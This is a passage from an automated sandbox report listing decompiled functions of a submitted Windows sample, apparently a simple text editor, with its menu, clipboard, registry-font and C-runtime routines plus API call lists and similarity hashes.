                    • Source File: 00000001.00000002.308786204.0000000000281000.00000020.00000001.01000000.00000004.sdmp, Offset: 00280000, based on PE: true
                    • Associated: 00000001.00000002.308778219.0000000000280000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000001.00000002.308809959.0000000000290000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000001.00000002.308823616.0000000000294000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000001.00000002.308829404.0000000000299000.00000002.00000001.01000000.00000004.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_280000_tchnhwrvi.jbxd
                    Similarity
                    • API ID: Heap$MessageProcessSendTextWindow$AllocFreeLengthlstrcmplstrlen
                    • String ID: Oqt
                    • API String ID: 276103653-2617001805
                    • Opcode ID: c514d8f6ecc0d49a918f88514ca0b310a8ec4b8aa51e9f1a4eb1f95d677bb2fc
                    • Instruction ID: c0cec1cefe3ffd0548520bcef76ecaa997d3f50c056d272f78f392dfc354abf1
                    • Opcode Fuzzy Hash: c514d8f6ecc0d49a918f88514ca0b310a8ec4b8aa51e9f1a4eb1f95d677bb2fc
                    • Instruction Fuzzy Hash: 13213E76A10209EFDB10EFA4EC8CE6A777CFB48300B008506FA0A97290DA70A9548B60
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 71%
                    			E00281F50(struct HMENU__* __esi) {
                    				signed int _t4;
                    				signed int _t8;
                    				signed int _t17;
                    				int _t23;
                    
                    				_t4 = SendMessageW( *0x2970ec, 0xc6, 0, 0);
                    				asm("sbb eax, eax");
                    				EnableMenuItem(__esi, 0x110,  ~_t4 + 1);
                    				_t8 = IsClipboardFormatAvailable(1);
                    				asm("sbb eax, eax");
                    				EnableMenuItem(__esi, 0x113,  ~_t8 + 1);
                    				_t23 = 0 | SendMessageW( *0x2970ec, 0xb0, 0, 0) >> 0x00000010 == _t12;
                    				EnableMenuItem(__esi, 0x111, _t23);
                    				EnableMenuItem(__esi, 0x112, _t23);
                    				EnableMenuItem(__esi, 0x114, _t23);
                    				_t17 = GetWindowTextLengthW( *0x2970ec);
                    				asm("sbb eax, eax");
                    				return EnableMenuItem(__esi, 0x116,  ~_t17 + 1);
                    			}








                    APIs
                    • SendMessageW.USER32(?,000000C6,00000000,00000000), ref: 00281F67
                    • EnableMenuItem.USER32 ref: 00281F7B
                    • IsClipboardFormatAvailable.USER32(00000001), ref: 00281F7F
                    • EnableMenuItem.USER32 ref: 00281F91
                    • SendMessageW.USER32(?,000000B0,00000000,00000000), ref: 00281FA3
                    • EnableMenuItem.USER32 ref: 00281FB9
                    • EnableMenuItem.USER32 ref: 00281FC2
                    • EnableMenuItem.USER32 ref: 00281FCB
                    • GetWindowTextLengthW.USER32(?), ref: 00281FD3
                    • EnableMenuItem.USER32 ref: 00281FE5
                    Memory Dump Source
                    • Source File: 00000001.00000002.308786204.0000000000281000.00000020.00000001.01000000.00000004.sdmp, Offset: 00280000, based on PE: true
                    • Associated: 00000001.00000002.308778219.0000000000280000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000001.00000002.308809959.0000000000290000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000001.00000002.308823616.0000000000294000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000001.00000002.308829404.0000000000299000.00000002.00000001.01000000.00000004.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_280000_tchnhwrvi.jbxd
                    Similarity
                    • API ID: EnableItemMenu$MessageSend$AvailableClipboardFormatLengthTextWindow
                    • String ID:
                    • API String ID: 2096502293-0
                    • Opcode ID: 31088af05e08a50a062e352662d32d304f9db3ef95a0c0b51c76f7e2d528dafe
                    • Instruction ID: 9ebaacd92223f7de4efb172a6879930719cc3c5db8172e0a30180bb5fcdef24f
                    • Opcode Fuzzy Hash: 31088af05e08a50a062e352662d32d304f9db3ef95a0c0b51c76f7e2d528dafe
                    • Instruction Fuzzy Hash: CC0169B17E121C7EF2247B75AC8BFBB225CDFC6B05F104112F702EA0D1CAA599028978
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 91%
                    			E002867DB(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                    				intOrPtr _t26;
                    				intOrPtr _t30;
                    				intOrPtr _t39;
                    				void* _t40;
                    
                    				_t31 = __ebx;
                    				_push(8);
                    				_push(0x292108);
                    				E00283D50(__ebx, __edi, __esi);
                    				GetModuleHandleW(L"KERNEL32.DLL");
                    				_t39 =  *((intOrPtr*)(_t40 + 8));
                    				 *((intOrPtr*)(_t39 + 0x5c)) = 0x290d30;
                    				 *(_t39 + 8) =  *(_t39 + 8) & 0x00000000;
                    				 *((intOrPtr*)(_t39 + 0x14)) = 1;
                    				 *((intOrPtr*)(_t39 + 0x70)) = 1;
                    				 *((char*)(_t39 + 0xc8)) = 0x43;
                    				 *((char*)(_t39 + 0x14b)) = 0x43;
                    				 *(_t39 + 0x68) = 0x294680;
                    				E00286FB4(__ebx, 1, 0xd);
                    				 *(_t40 - 4) =  *(_t40 - 4) & 0x00000000;
                    				InterlockedIncrement( *(_t39 + 0x68));
                    				 *(_t40 - 4) = 0xfffffffe;
                    				E0028687D();
                    				E00286FB4(_t31, 1, 0xc);
                    				 *(_t40 - 4) = 1;
                    				_t15 = _t40 + 0xc; // 0x282e0d
                    				_t26 =  *_t15;
                    				 *((intOrPtr*)(_t39 + 0x6c)) = _t26;
                    				if(_t26 == 0) {
                    					_t30 =  *0x294de8; // 0x294d10
                    					 *((intOrPtr*)(_t39 + 0x6c)) = _t30;
                    				}
                    				E00288D2A( *((intOrPtr*)(_t39 + 0x6c)));
                    				 *(_t40 - 4) = 0xfffffffe;
                    				return E00283D95(E00286886());
                    			}








                    APIs
                    • GetModuleHandleW.KERNEL32(KERNEL32.DLL,00292108,00000008,002868E3,00000000,00000000,?,002840A2,.(,?,?,?,00282E0D,00000000,?), ref: 002867EC
                    • __lock.LIBCMT ref: 00286820
                      • Part of subcall function 00286FB4: __mtinitlocknum.LIBCMT ref: 00286FCA
                      • Part of subcall function 00286FB4: __amsg_exit.LIBCMT ref: 00286FD6
                      • Part of subcall function 00286FB4: EnterCriticalSection.KERNEL32(00000000,00000000,?,00286825,0000000D,?,002840A2,.(,?,?,?,00282E0D,00000000,?), ref: 00286FDE
                    • InterlockedIncrement.KERNEL32(?), ref: 0028682D
                    • __lock.LIBCMT ref: 00286841
                    • ___addlocaleref.LIBCMT ref: 0028685F
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.308786204.0000000000281000.00000020.00000001.01000000.00000004.sdmp, Offset: 00280000, based on PE: true
                    • Associated: 00000001.00000002.308778219.0000000000280000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000001.00000002.308809959.0000000000290000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000001.00000002.308823616.0000000000294000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000001.00000002.308829404.0000000000299000.00000002.00000001.01000000.00000004.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_280000_tchnhwrvi.jbxd
                    Similarity
                    • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                    • String ID: .($0)$KERNEL32.DLL
                    • API String ID: 637971194-3816618702
                    • Opcode ID: 07016d170939545566bcf6ee9e844bb9e7e507ad9d215c00650ebb8248762096
                    • Instruction ID: 897f178debcedfd16e2537ee1b020bdec4b7f6cfe0dc2366be9cfbc5eb196a45
                    • Opcode Fuzzy Hash: 07016d170939545566bcf6ee9e844bb9e7e507ad9d215c00650ebb8248762096
                    • Instruction Fuzzy Hash: D201AD75412700EFD720BF65E809709FBE0AF10320F10490EE49A577E0CBB0AA64CF14
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 84%
                    			E00281160() {
                    				struct tagRECT _v20;
                    				struct tagRECT _v36;
                    				signed int _t10;
                    				int _t21;
                    				int _t34;
                    				intOrPtr _t35;
                    
                    				_t10 = 0 |  *0x2970f8 == 0x00000000;
                    				 *0x2970f8 = _t10;
                    				asm("sbb eax, eax");
                    				CheckMenuItem(GetMenu( *0x2970e4), 0x205,  ~_t10 & 0x00000008);
                    				GetClientRect( *0x2970e4,  &_v20);
                    				asm("sbb eax, eax");
                    				ShowWindow( *0x2970f4,  ~( *0x2970f8) & 0x00000005);
                    				_t35 = _v20.bottom;
                    				_t34 = _v20.right;
                    				_t21 = 0;
                    				if( *0x2970f8 != 0) {
                    					SendMessageW( *0x2970f4, 5, 0, 0);
                    					GetWindowRect( *0x2970f4,  &_v36);
                    					_t21 = _v36.bottom - _v36.top;
                    				}
                    				SetWindowPos( *0x2970ec, 0, 0, 0, _t34, _t35 - _t21, 0x204);
                    				return E00281090();
                    			}










                    APIs
                    • GetMenu.USER32(?), ref: 0028118B
                    • CheckMenuItem.USER32(00000000), ref: 00281192
                    • GetClientRect.USER32 ref: 002811A3
                    • ShowWindow.USER32(?,?), ref: 002811BD
                    • SendMessageW.USER32(?,00000005,00000000,00000000), ref: 002811DE
                    • GetWindowRect.USER32 ref: 002811EF
                    • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000204), ref: 00281211
                    Memory Dump Source
                    • Source File: 00000001.00000002.308786204.0000000000281000.00000020.00000001.01000000.00000004.sdmp, Offset: 00280000, based on PE: true
                    • Associated: 00000001.00000002.308778219.0000000000280000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000001.00000002.308809959.0000000000290000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000001.00000002.308823616.0000000000294000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000001.00000002.308829404.0000000000299000.00000002.00000001.01000000.00000004.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_280000_tchnhwrvi.jbxd
                    Similarity
                    • API ID: Window$MenuRect$CheckClientItemMessageSendShow
                    • String ID:
                    • API String ID: 1873219884-0
                    • Opcode ID: 5e2dae1d591911e2bda0c7fe2bbc35a4e4642905c10af0262a8f2b52d905c589
                    • Instruction ID: d298f31800ca825345a110d533cc6ed42ef43913a9f12aa33c3243670af063dc
                    • Opcode Fuzzy Hash: 5e2dae1d591911e2bda0c7fe2bbc35a4e4642905c10af0262a8f2b52d905c589
                    • Instruction Fuzzy Hash: 0211607566421AAFD710DB74FD8EEBB37BCEB48701F104527FA19D3290E634A8408B64
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 81%
                    			E00288869(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                    				signed int _t15;
                    				LONG* _t21;
                    				void* _t31;
                    				LONG* _t33;
                    				void* _t34;
                    				void* _t35;
                    
                    				_t35 = __eflags;
                    				_t29 = __edx;
                    				_t25 = __ebx;
                    				_push(0xc);
                    				_push(0x292218);
                    				E00283D50(__ebx, __edi, __esi);
                    				_t31 = E00286908(__ebx, __edx, _t35);
                    				_t15 =  *0x294ba0; // 0xfffffffe
                    				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
                    					E00286FB4(_t25, _t31, 0xd);
                    					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
                    					_t33 =  *(_t31 + 0x68);
                    					 *(_t34 - 0x1c) = _t33;
                    					__eflags = _t33 -  *0x294aa8; // 0x28f2ba0
                    					if(__eflags != 0) {
                    						__eflags = _t33;
                    						if(__eflags != 0) {
                    							__eflags = InterlockedDecrement(_t33);
                    							if(__eflags == 0) {
                    								__eflags = _t33 - 0x294680;
                    								if(__eflags != 0) {
                    									E00286D64(_t33);
                    								}
                    							}
                    						}
                    						_t21 =  *0x294aa8; // 0x28f2ba0
                    						 *(_t31 + 0x68) = _t21;
                    						_t33 =  *0x294aa8; // 0x28f2ba0
                    						 *(_t34 - 0x1c) = _t33;
                    						InterlockedIncrement(_t33);
                    					}
                    					 *(_t34 - 4) = 0xfffffffe;
                    					E00288904();
                    				} else {
                    					_t33 =  *(_t31 + 0x68);
                    				}
                    				_t38 = _t33;
                    				if(_t33 == 0) {
                    					_push(0x20);
                    					E00286018(_t29, _t38);
                    				}
                    				return E00283D95(_t33);
                    			}










                    APIs
                    • __getptd.LIBCMT ref: 00288875
                      • Part of subcall function 00286908: __getptd_noexit.LIBCMT ref: 0028690B
                      • Part of subcall function 00286908: __amsg_exit.LIBCMT ref: 00286918
                    • __amsg_exit.LIBCMT ref: 00288895
                    • __lock.LIBCMT ref: 002888A5
                    • InterlockedDecrement.KERNEL32(?), ref: 002888C2
                    • _free.LIBCMT ref: 002888D5
                    • InterlockedIncrement.KERNEL32(028F2BA0), ref: 002888ED
                    Memory Dump Source
                    • Source File: 00000001.00000002.308786204.0000000000281000.00000020.00000001.01000000.00000004.sdmp, Offset: 00280000, based on PE: true
                    • Associated: 00000001.00000002.308778219.0000000000280000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000001.00000002.308809959.0000000000290000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000001.00000002.308823616.0000000000294000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000001.00000002.308829404.0000000000299000.00000002.00000001.01000000.00000004.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_280000_tchnhwrvi.jbxd
                    Similarity
                    • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                    • String ID:
                    • API String ID: 3470314060-0
                    • Opcode ID: 1277535ef06fe0f3cad4d47dfb4f4b24c0652439060b9f18cba5d371534ac753
                    • Instruction ID: 84137c96b7b895cfbe0124852af427265dd5a560597324c05d5ac04aedb2ce7a
                    • Opcode Fuzzy Hash: 1277535ef06fe0f3cad4d47dfb4f4b24c0652439060b9f18cba5d371534ac753
                    • Instruction Fuzzy Hash: D0018439D6272AAFCB20BF54A809B5D7760BF04720FC5001AE800676D1CB346972CFD6
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E002892BB(void* __edi, short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
                    				char _v8;
                    				signed int _v12;
                    				char _v20;
                    				char _t43;
                    				char _t46;
                    				signed int _t53;
                    				signed int _t54;
                    				intOrPtr _t56;
                    				int _t57;
                    				int _t58;
                    				char _t59;
                    				short* _t60;
                    				int _t65;
                    				char* _t73;
                    
                    				_t73 = _a8;
                    				if(_t73 == 0 || _a12 == 0) {
                    					L5:
                    					return 0;
                    				} else {
                    					if( *_t73 != 0) {
                    						E002841F6( &_v20, __edi, _a16);
                    						_t43 = _v20;
                    						__eflags =  *(_t43 + 0x14);
                    						if( *(_t43 + 0x14) != 0) {
                    							_t46 = E002893EB( *_t73 & 0x000000ff,  &_v20);
                    							__eflags = _t46;
                    							if(_t46 == 0) {
                    								__eflags = _a4;
                    								__eflags = MultiByteToWideChar( *(_v20 + 4), 9, _t73, 1, _a4, 0 | _a4 != 0x00000000);
                    								if(__eflags != 0) {
                    									L10:
                    									__eflags = _v8;
                    									if(_v8 != 0) {
                    										_t53 = _v12;
                    										_t11 = _t53 + 0x70;
                    										 *_t11 =  *(_t53 + 0x70) & 0xfffffffd;
                    										__eflags =  *_t11;
                    									}
                    									return 1;
                    								}
                    								L21:
                    								_t54 = E00283CF8(__eflags);
                    								 *_t54 = 0x2a;
                    								__eflags = _v8;
                    								if(_v8 != 0) {
                    									_t54 = _v12;
                    									_t33 = _t54 + 0x70;
                    									 *_t33 =  *(_t54 + 0x70) & 0xfffffffd;
                    									__eflags =  *_t33;
                    								}
                    								return _t54 | 0xffffffff;
                    							}
                    							_t56 = _v20;
                    							_t65 =  *(_t56 + 0xac);
                    							__eflags = _t65 - 1;
                    							if(_t65 <= 1) {
                    								L17:
                    								__eflags = _a12 -  *(_t56 + 0xac);
                    								if(__eflags < 0) {
                    									goto L21;
                    								}
                    								__eflags = _t73[1];
                    								if(__eflags == 0) {
                    									goto L21;
                    								}
                    								L19:
                    								_t57 =  *(_t56 + 0xac);
                    								__eflags = _v8;
                    								if(_v8 == 0) {
                    									return _t57;
                    								}
                    								 *((intOrPtr*)(_v12 + 0x70)) =  *(_v12 + 0x70) & 0xfffffffd;
                    								return _t57;
                    							}
                    							__eflags = _a12 - _t65;
                    							if(_a12 < _t65) {
                    								goto L17;
                    							}
                    							__eflags = _a4;
                    							_t58 = MultiByteToWideChar( *(_t56 + 4), 9, _t73, _t65, _a4, 0 | _a4 != 0x00000000);
                    							__eflags = _t58;
                    							_t56 = _v20;
                    							if(_t58 != 0) {
                    								goto L19;
                    							}
                    							goto L17;
                    						}
                    						_t59 = _a4;
                    						__eflags = _t59;
                    						if(_t59 != 0) {
                    							 *_t59 =  *_t73 & 0x000000ff;
                    						}
                    						goto L10;
                    					} else {
                    						_t60 = _a4;
                    						if(_t60 != 0) {
                    							 *_t60 = 0;
                    						}
                    						goto L5;
                    					}
                    				}
                    			}


















                    APIs
                    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 002892EF
                    • __isleadbyte_l.LIBCMT ref: 00289322
                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00282E0D,?,00000000,00000000,?,?,?,?,00282E0D,00000000,?), ref: 00289353
                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00282E0D,00000001,00000000,00000000,?,?,?,?,00282E0D,00000000,?), ref: 002893C1
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.308786204.0000000000281000.00000020.00000001.01000000.00000004.sdmp, Offset: 00280000, based on PE: true
                    • Associated: 00000001.00000002.308778219.0000000000280000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000001.00000002.308809959.0000000000290000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000001.00000002.308823616.0000000000294000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000001.00000002.308829404.0000000000299000.00000002.00000001.01000000.00000004.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_280000_tchnhwrvi.jbxd
                    Similarity
                    • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                    • String ID: pYqt0yqt
                    • API String ID: 3058430110-2035559450
                    • Opcode ID: e92abb991ef77fd61edb1738c920f96238c612f6d8e32b31cf1c8921328d1ad9
                    • Instruction ID: 6c49353cee6375a8602430ad49f29ad01738cb9e001f183b89820eef730d803d
                    • Opcode Fuzzy Hash: e92abb991ef77fd61edb1738c920f96238c612f6d8e32b31cf1c8921328d1ad9
                    • Instruction Fuzzy Hash: 3931E235A2224AFFCB10EF64C8859BE3BB8BF01311F1885A9E4659B1D6D330CDA0DB50
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E00281020() {
                    				void* _v8;
                    				int _v12;
                    				int _v16;
                    				char _v20;
                    				char _t16;
                    				char _t21;
                    
                    				_t21 = 0x60;
                    				if(RegOpenKeyW(0x80000005, L"Software\\Fonts",  &_v8) == 0) {
                    					_v12 = 4;
                    					if(RegQueryValueExW(_v8, L"LogPixels", 0,  &_v16,  &_v20,  &_v12) == 0 && _v16 == 4) {
                    						_t16 = _v20;
                    						if(_t16 != 0) {
                    							_t21 = _t16;
                    						}
                    					}
                    					RegCloseKey(_v8);
                    				}
                    				return _t21;
                    			}










                    APIs
                    • RegOpenKeyW.ADVAPI32(80000005,Software\Fonts,?), ref: 0028103A
                    • RegQueryValueExW.ADVAPI32(?,LogPixels,00000000,00281594,?,?,?,00281594), ref: 00281062
                    • RegCloseKey.ADVAPI32(?,?,00281594), ref: 0028107F
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.308786204.0000000000281000.00000020.00000001.01000000.00000004.sdmp, Offset: 00280000, based on PE: true
                    • Associated: 00000001.00000002.308778219.0000000000280000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000001.00000002.308809959.0000000000290000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000001.00000002.308823616.0000000000294000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000001.00000002.308829404.0000000000299000.00000002.00000001.01000000.00000004.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_280000_tchnhwrvi.jbxd
                    Similarity
                    • API ID: CloseOpenQueryValue
                    • String ID: LogPixels$Software\Fonts
                    • API String ID: 3677997916-4238338266
                    • Opcode ID: ec47200165fe8600c54d34ae0db90ad44790778083e78f9b90c9336b94be9767
                    • Instruction ID: 306c5256eadb9436e8dc5988c617e6a8f06c15c9f70c456ece14354245bdb028
                    • Opcode Fuzzy Hash: ec47200165fe8600c54d34ae0db90ad44790778083e78f9b90c9336b94be9767
                    • Instruction Fuzzy Hash: 3AF01975A1020AABDB10DF949C84FAF73BCAB04741F104599ED05E2180E631AA65CB95
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 94%
                    			E0028A613(void* __edx, void* __edi, void* __esi, void* _a4, long _a8) {
                    				void* _t7;
                    				long _t8;
                    				intOrPtr* _t9;
                    				intOrPtr* _t12;
                    				long _t27;
                    				long _t30;
                    
                    				if(_a4 != 0) {
                    					_push(__esi);
                    					_t30 = _a8;
                    					__eflags = _t30;
                    					if(_t30 != 0) {
                    						_push(__edi);
                    						while(1) {
                    							__eflags = _t30 - 0xffffffe0;
                    							if(_t30 > 0xffffffe0) {
                    								break;
                    							}
                    							__eflags = _t30;
                    							if(_t30 == 0) {
                    								_t30 = _t30 + 1;
                    								__eflags = _t30;
                    							}
                    							_t7 = HeapReAlloc( *0x295a6c, 0, _a4, _t30);
                    							_t27 = _t7;
                    							__eflags = _t27;
                    							if(_t27 != 0) {
                    								L17:
                    								_t8 = _t27;
                    							} else {
                    								__eflags =  *0x295f5c - _t7;
                    								if(__eflags == 0) {
                    									_t9 = E00283CF8(__eflags);
                    									 *_t9 = E00283CB6(GetLastError());
                    									goto L17;
                    								} else {
                    									__eflags = E0028A030(_t7, _t30);
                    									if(__eflags == 0) {
                    										_t12 = E00283CF8(__eflags);
                    										 *_t12 = E00283CB6(GetLastError());
                    										L12:
                    										_t8 = 0;
                    										__eflags = 0;
                    									} else {
                    										continue;
                    									}
                    								}
                    							}
                    							goto L14;
                    						}
                    						E0028A030(_t6, _t30);
                    						 *((intOrPtr*)(E00283CF8(__eflags))) = 0xc;
                    						goto L12;
                    					} else {
                    						E00286D64(_a4);
                    						_t8 = 0;
                    					}
                    					L14:
                    					return _t8;
                    				} else {
                    					return E0028A4FD(__edx, __edi, __esi, _a8);
                    				}
                    			}










                    APIs
                    • _malloc.LIBCMT ref: 0028A621
                      • Part of subcall function 0028A4FD: __FF_MSGBANNER.LIBCMT ref: 0028A516
                      • Part of subcall function 0028A4FD: __NMSG_WRITE.LIBCMT ref: 0028A51D
                      • Part of subcall function 0028A4FD: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,00286C96,00000000,00000001,00000000,?,00286F3F,00000018,00292178,0000000C,00286FCF), ref: 0028A542
                    • _free.LIBCMT ref: 0028A634
                    Memory Dump Source
                    • Source File: 00000001.00000002.308786204.0000000000281000.00000020.00000001.01000000.00000004.sdmp, Offset: 00280000, based on PE: true
                    • Associated: 00000001.00000002.308778219.0000000000280000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000001.00000002.308809959.0000000000290000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000001.00000002.308823616.0000000000294000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000001.00000002.308829404.0000000000299000.00000002.00000001.01000000.00000004.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_280000_tchnhwrvi.jbxd
                    Similarity
                    • API ID: AllocateHeap_free_malloc
                    • String ID:
                    • API String ID: 1020059152-0
                    • Opcode ID: a1285f0af0c4e35a3a16c079fb2ede2cdaa62f9048aeef5b8f58784441b5991f
                    • Instruction ID: 8b1c38851e5a957656932905b8294c8beb5e52fbe9aacbabd78ad63360d43619
                    • Opcode Fuzzy Hash: a1285f0af0c4e35a3a16c079fb2ede2cdaa62f9048aeef5b8f58784441b5991f
                    • Instruction Fuzzy Hash: 7611083A537625AADF313F74E809B5D379C9B403A0B298427FC05961D0FE7489708F95
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 78%
                    			E00288FEC(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                    				signed int _t12;
                    				void* _t28;
                    				intOrPtr _t29;
                    				void* _t30;
                    				void* _t31;
                    
                    				_t31 = __eflags;
                    				_t26 = __edi;
                    				_t25 = __edx;
                    				_t20 = __ebx;
                    				_push(0xc);
                    				_push(0x292258);
                    				E00283D50(__ebx, __edi, __esi);
                    				_t28 = E00286908(__ebx, __edx, _t31);
                    				_t12 =  *0x294ba0; // 0xfffffffe
                    				if(( *(_t28 + 0x70) & _t12) == 0) {
                    					L6:
                    					E00286FB4(_t20, _t26, 0xc);
                    					 *(_t30 - 4) =  *(_t30 - 4) & 0x00000000;
                    					_t29 = _t28 + 0x6c;
                    					 *((intOrPtr*)(_t30 - 0x1c)) = E00288F9D(_t29,  *0x294de8);
                    					 *(_t30 - 4) = 0xfffffffe;
                    					E00289059();
                    				} else {
                    					_t33 =  *((intOrPtr*)(_t28 + 0x6c));
                    					if( *((intOrPtr*)(_t28 + 0x6c)) == 0) {
                    						goto L6;
                    					} else {
                    						_t29 =  *((intOrPtr*)(E00286908(_t20, __edx, _t33) + 0x6c));
                    					}
                    				}
                    				_t34 = _t29;
                    				if(_t29 == 0) {
                    					_push(0x20);
                    					E00286018(_t25, _t34);
                    				}
                    				return E00283D95(_t29);
                    			}









                    APIs
                    • __getptd.LIBCMT ref: 00288FF8
                      • Part of subcall function 00286908: __getptd_noexit.LIBCMT ref: 0028690B
                      • Part of subcall function 00286908: __amsg_exit.LIBCMT ref: 00286918
                    • __getptd.LIBCMT ref: 0028900F
                    • __amsg_exit.LIBCMT ref: 0028901D
                    • __lock.LIBCMT ref: 0028902D
                    • __updatetlocinfoEx_nolock.LIBCMT ref: 00289041
                    Memory Dump Source
                    • Source File: 00000001.00000002.308786204.0000000000281000.00000020.00000001.01000000.00000004.sdmp, Offset: 00280000, based on PE: true
                    • Associated: 00000001.00000002.308778219.0000000000280000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000001.00000002.308809959.0000000000290000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000001.00000002.308823616.0000000000294000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000001.00000002.308829404.0000000000299000.00000002.00000001.01000000.00000004.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_280000_tchnhwrvi.jbxd
                    Similarity
                    • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                    • String ID:
                    • API String ID: 938513278-0
                    • Opcode ID: 817099fbc43211af88f122356ecb12a9e4b82689294a8166dd8079b4875a5a39
                    • Instruction ID: 053b38cad9e0da09abf38205a6be91bbc7b74487292a8b85b21c634c357aa49d
                    • Opcode Fuzzy Hash: 817099fbc43211af88f122356ecb12a9e4b82689294a8166dd8079b4875a5a39
                    • Instruction Fuzzy Hash: 06F0B43AE377049BDB21BBB4A90BB2D37D06F01721F554109F510AB2D2CB744AA1AF96
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 93%
                    			E00281090() {
                    				void* _v8;
                    				void* _v12;
                    				void* _v524;
                    				int _t10;
                    				long _t13;
                    				long _t17;
                    				int _t28;
                    				int _t29;
                    
                    				SendMessageW( *0x2970ec, 0xb0,  &_v12,  &_v8);
                    				_t10 = _v12;
                    				_t28 = _v8;
                    				if(_t10 != _t28) {
                    					if(_t10 <  *0x298270) {
                    						_t28 = _t10;
                    					}
                    				} else {
                    					 *0x298270 = _t10;
                    				}
                    				_t29 = SendMessageW( *0x2970ec, 0xc9, _t28, 0);
                    				_t13 = SendMessageW( *0x2970ec, 0xbb, _t29, 0);
                    				if( *0x298274 != _t29 ||  *0x298278 != _t28) {
                    					_push(_t28 - _t13 + 1);
                    					_t5 = _t29 + 1; // 0x1
                    					E00281000( &_v524, 0x231,  *0x2970fc, _t5);
                    					_t17 = SendMessageW( *0x2970f4, 0x29, 0,  &_v524);
                    					 *0x298274 = _t29;
                    					 *0x298278 = _t28;
                    					return _t17;
                    				} else {
                    					return _t13;
                    				}
                    			}












                    APIs
                    • SendMessageW.USER32(?,000000B0,?,?), ref: 002810B6
                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 002810E1
                    • SendMessageW.USER32(?,000000BB,00000000,00000000), ref: 002810F4
                    • SendMessageW.USER32(?,00000029,00000000,?), ref: 0028113D
                    Memory Dump Source
                    • Source File: 00000001.00000002.308786204.0000000000281000.00000020.00000001.01000000.00000004.sdmp, Offset: 00280000, based on PE: true
                    • Associated: 00000001.00000002.308778219.0000000000280000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000001.00000002.308809959.0000000000290000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000001.00000002.308823616.0000000000294000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000001.00000002.308829404.0000000000299000.00000002.00000001.01000000.00000004.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_280000_tchnhwrvi.jbxd
                    Similarity
                    • API ID: MessageSend
                    • String ID:
                    • API String ID: 3850602802-0
                    • Opcode ID: 8f9e7e1eb2eb4ff65370eb654d8b063f56432c1875c7e953f8628fa1716ea4b8
